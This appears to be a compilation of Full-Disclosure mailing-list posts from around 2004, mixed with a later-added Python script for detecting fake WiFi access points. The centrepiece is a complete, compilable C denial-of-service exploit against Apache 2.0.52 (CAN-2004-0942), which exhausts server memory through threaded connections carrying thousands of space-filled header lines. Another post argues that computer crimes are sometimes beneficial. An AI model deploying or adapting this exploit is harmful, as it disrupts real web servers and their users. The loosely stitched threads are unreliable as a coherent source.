> But no, when we move onto online malicious hacker crimes, it's OK for sites such as zone-h, which allow malicious hackers to post links for other hackers to get a kick over, just like a child abuser would by visiting a child porn photo. Imagine a child abuse site which also kept a scoreboard of the biggest child porn photo posters. Yet again, when we move onto malicious hacker online crimes, it seems to be different for zone-h to keep scores of the biggest malicious hacker defacement posters.
>
> Why one rule for one online crime promotion site and not the same rule for another online crime promotion site? I guess you would allow a child porn promotion site, like you think it's OK for zone-h to be online promoting online malicious hacking and not closed down.
>
> Thanks,
> n3td3v
> http://www.geocities.com/n3td3v
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
What happened to "the government can have my electronic speech when they pry it from my cold, dead fingers"?

Many people fail to understand that incompetency knows no limits or bounds. It is alive and well in all human institutions and activities, and each one of us is in fact incompetent in any number of ways. Only knowledge and the ability to spot incompetency protect us from ourselves while simultaneously providing the only defense possible against all types of harm that result systemically from anything that one person can do or create that by design impacts other people.

Unimpeded freedom and full-disclosure serve the interests of the people by spreading that knowledge and ability. Crimes that result in awareness of other people's serious failures and incompetency, where such is actively harming others, serve a useful purpose for society. Computers could be said to be something of a crime against humanity to begin with. Crimes against computers pose an unusually complicated ethics puzzle, and at times are clearly beneficial to everyone.

Regards,
Jason Coombs
[Full-Disclosure] Re: DoS in Apache 2.0.52 ?
Like Mauro, I also rewrote the exploit for Linux and couldn't get it to work at first. But I looked at it a little more and found it was because Gentoo already had it patched. It looks like most of the other vendors are also already on the ball with this one. So, as long as it works, here it is:

apache-squ1rt.c:

/*
 * Apache Squ1rt, Denial of Service Proof of Concept
 * Tested on Apache 2.0.52
 * [EMAIL PROTECTED]
 * [EMAIL PROTECTED]
 *
 * Sends a request that starts with:
 *   GET / HTTP/1.0\n
 *   <8000 spaces>\n
 *   <8000 spaces>\n
 *   <8000 spaces>\n
 *   ... 8000 times
 *
 * Apache never kills it. Takes up huge amounts of RAM which increase
 * with each connection.
 *
 * Original credit goes to Chintan Trivedi on the FullDisclosure mailing list:
 *   http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
 * More info:
 *   http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
 *
 * Versions between 2.0.35 and 2.0.52 may be vulnerable, but only down to
 * 2.0.50 was tested.
 *
 * This attack may be preventable with a properly configured iptables ruleset.
 * Gentoo already has a patch out in the 2.0.52-r1 release in the file
 * 06_all_gentoo_protocol.patch
 *
 * v2 Rewritten to use pthread.
 *
 * gcc apache-squ1rt.c -lpthread
 */

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pthread.h>

#define DEST_PORT 80

/* thread body: takes the target host name as its argument */
void *squirtIt(void *arg);

char attackBuf[8000];       /* one 7998-space line, '\n' terminated */
char letsGetStarted[128];   /* the request line */

int main(int argc, char **argv){
    int num_connect;
    int ret;
    pthread_t tid[35];

    sprintf(letsGetStarted, "GET / HTTP/1.0\n");
    memset(attackBuf, ' ', 8000);
    attackBuf[7998] = '\n';
    attackBuf[7999] = '\0';

    if (argc != 2){
        fprintf(stderr, "Usage: %s <host name>\n", argv[0]);
        exit(1);
    }

    /* one connection per thread */
    for(num_connect = 0; num_connect < 35; num_connect++){
        ret = pthread_create(&tid[num_connect], NULL, squirtIt, argv[1]);
        if (ret != 0){
            fprintf(stderr, "pthread_create(): %s\n", strerror(ret));
        }
    }

    /* assuming any of these threads actually terminate, this waits for all of them */
    for(num_connect = 0; num_connect < 35; num_connect++){
        pthread_join(tid[num_connect], NULL);
    }
    return 0;
}

void *squirtIt(void *arg){
    char *hName = (char *)arg;
    int sock, i;
    struct hostent *target;
    struct sockaddr_in addy;

    if((target = gethostbyname(hName)) == NULL){
        herror("gethostbyname()");
        exit(1);
    }
    if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
        perror("socket()");
        exit(1);
    }

    addy.sin_family = AF_INET;
    addy.sin_port = htons(DEST_PORT);
    bcopy(target->h_addr, (char *)&addy.sin_addr, target->h_length);
    memset(&(addy.sin_zero), '\0', 8);

    if((connect(sock, (struct sockaddr *)&addy, sizeof(addy))) < 0){
        perror("connect()");
        exit(1);
    }

    /* request line, then the continuation lines described in the header comment */
    send(sock, letsGetStarted, strlen(letsGetStarted), 0);
    for(i = 0; i < 8000; i++){
        send(sock, attackBuf, strlen(attackBuf), 0);
    }
    close(sock);
    return NULL;
}
Re: [Full-Disclosure] I am out of here
You're right, in all that Dune of Sand, there really are some pearls, hard to find but they are there.

Simon

Barry Fitzgerald wrote:

> Berend-Jan Wever wrote:
>
>> If you can't stand the heat, get out of the kitchen! And btw: if you're not cooking, get the fuck out too!
>
> Yeah - how hard is it to hit delete anyway?
>
> (I don't think I've ever joined a mailing list expecting every post to be interesting to me... nor even the majority. It seems like an unrealistic expectation.)
>
> -Barry
Re: [Full-Disclosure] For your pleasure
oh? -

08/23/2001 05:00 AM 354,468 wmpaud1.wav
( bintext output )
00056862 00056862 0 INFOICRD
0005686E 0005686E 0 2000-04-06
00056882 00056882 0 Deepz0ne
00056894 00056894 0 Sound Forge 4.5

- ..heh

> Guys,
>
> For your pleasure: http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php
>
> I know it is in French, but here is my translation; it deserves to be known.
>
> "Digging into Windows XP operating systems, the journalists of PC Welt discovered the following text at the end of the files present in the C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory: [see the picture at the link]
>
> You have to know that Deepz0ne is the nickname of a founding member of the Radium cracking group, created in 1997 and specialized in the cracking of sound-oriented software. To say it another way, the Microsoft guy who created these files used a cracked version of the Sound Forge program. Even if it is probable the Redmond giant has a license for this program ($400), it looks bad to see this when we are hearing everywhere about the Microsoft anti-piracy policy..."
>
> Laurent LEVIER
> Systems & Networks Security Expert, CISSP CISM
RE: [Full-Disclosure] WiFi question
I would have to agree with GuidoZ. The changing MAC would point to something being up. APs using different channels is pretty common in some models, but the MAC changing and being from different vendors points to a fake AP. I bet you 10 bucks the WEP key changes on all but one of them each time too..lol

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of GuidoZ
Sent: Wednesday, November 17, 2004 12:42 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] WiFi question

I'm not 100% on this, as it could be something I've never heard of (of course). However, it sounds a lot like someone is playing with FakeAP:
- http://www.blackalchemy.to/project/fakeap/

It's not real difficult to set up and only requires a Prism chipset card (one or more) and a compatible Linux distro. It's been around for over 2 years, but hasn't been touched for about the same amount of time. See the site for more.

--
Peace. ~G

On Wed, 17 Nov 2004 13:53:07 +0000, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

> List,
>
> I'm an expert in nothing, so when I saw this I had to ask, as I'm sure there's someone out there that is a WiFi expert. Google has found no answer so here goes.
>
> Last night we saw a new access point appear. No problems, it's an ad-hoc network so it's someone's machine with XP on, configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4th. Then the first two drop off; this repeats forever. Always using a different MAC address when a new AP appears.
>
> The APs are all WEP enabled (which I can't crack cos I don't have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers), so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell it's coming from this office (the IT dept), basing that assumption on signal strength.
>
> Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!)
>
> Answers on a post card :)
>
> Colin.
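The pattern Colin describes and Todd and GuidoZ diagnose in both WiFi threads (one ESSID, many short-lived BSSIDs, OUIs from different vendors) can be flagged automatically from stumbler output. The following is an added example, not a tool from the thread: it summarizes constructed beacon observations per ESSID and raises a finding when the BSSID set churns across several vendor prefixes. The OUI-to-vendor table and all observations are constructed for illustration; a real check would look prefixes up in the IEEE OUI registry.

```python
"""Constructed example: flag an ESSID advertised by rapidly rotating, multi-vendor BSSIDs."""
from collections import defaultdict
from statistics import median

# Constructed OUI table (first three octets -> vendor). Hypothetical values.
OUI_VENDOR = {
    "00:11:22": "VendorA", "00:33:44": "VendorB", "00:55:66": "VendorC",
    "00:77:88": "VendorD", "00:aa:bb": "VendorE",
}

# Constructed observations as a stumbler might log them: (seconds, BSSID, ESSID).
OBSERVATIONS = [
    # "CORP": two real APs from one vendor, both present for the whole window.
    (0, "00:aa:bb:00:00:01", "CORP"), (0, "00:aa:bb:00:00:02", "CORP"),
    (30, "00:aa:bb:00:00:01", "CORP"), (30, "00:aa:bb:00:00:02", "CORP"),
    (60, "00:aa:bb:00:00:01", "CORP"), (60, "00:aa:bb:00:00:02", "CORP"),
    # "HOMENET": BSSIDs appear in pairs, live a few seconds, and are replaced by
    # new ones carrying different vendor prefixes, as described in the thread.
    (0, "00:11:22:01:01:01", "HOMENET"), (0, "00:33:44:02:02:02", "HOMENET"),
    (5, "00:11:22:01:01:01", "HOMENET"), (5, "00:33:44:02:02:02", "HOMENET"),
    (10, "00:55:66:03:03:03", "HOMENET"), (15, "00:77:88:04:04:04", "HOMENET"),
    (20, "00:55:66:03:03:03", "HOMENET"), (20, "00:77:88:04:04:04", "HOMENET"),
    (25, "00:11:22:05:05:05", "HOMENET"), (30, "00:33:44:06:06:06", "HOMENET"),
]


def vendor_of(bssid):
    """Map a MAC to its vendor via the (constructed) OUI table."""
    return OUI_VENDOR.get(bssid[:8].lower(), "unknown")


def summarize(observations):
    """Per ESSID, one entry per BSSID: (bssid, vendor, seconds between first and
    last sighting). A BSSID seen only once gets a lifetime of 0."""
    first, last, essid_of = {}, {}, {}
    for t, bssid, essid in observations:
        first.setdefault(bssid, t)
        last[bssid] = t
        essid_of[bssid] = essid
    per_essid = defaultdict(list)
    for bssid, essid in essid_of.items():
        per_essid[essid].append((bssid, vendor_of(bssid), last[bssid] - first[bssid]))
    return per_essid


def find_rotating_essids(observations, min_bssids=3, min_vendors=2,
                         max_median_lifetime=15):
    """Flag an ESSID when it is advertised by at least min_bssids distinct BSSIDs,
    those BSSIDs span at least min_vendors OUI vendors, and the typical BSSID
    disappears again within max_median_lifetime seconds. Several real APs sharing
    one ESSID (same vendor, long-lived) do not trip this. Returns {essid: finding}."""
    findings = {}
    for essid, entries in summarize(observations).items():
        bssids = {b for b, _, _ in entries}
        vendors = {v for _, v, _ in entries}
        lifetime = median(life for _, _, life in entries)
        if (len(bssids) >= min_bssids and len(vendors) >= min_vendors
                and lifetime <= max_median_lifetime):
            findings[essid] = {
                "bssids": len(bssids),
                "vendors": sorted(vendors),
                "median_lifetime_s": lifetime,
            }
    return findings


if __name__ == "__main__":
    for essid, finding in find_rotating_essids(OBSERVATIONS).items():
        print(f"{essid}: {finding}")
```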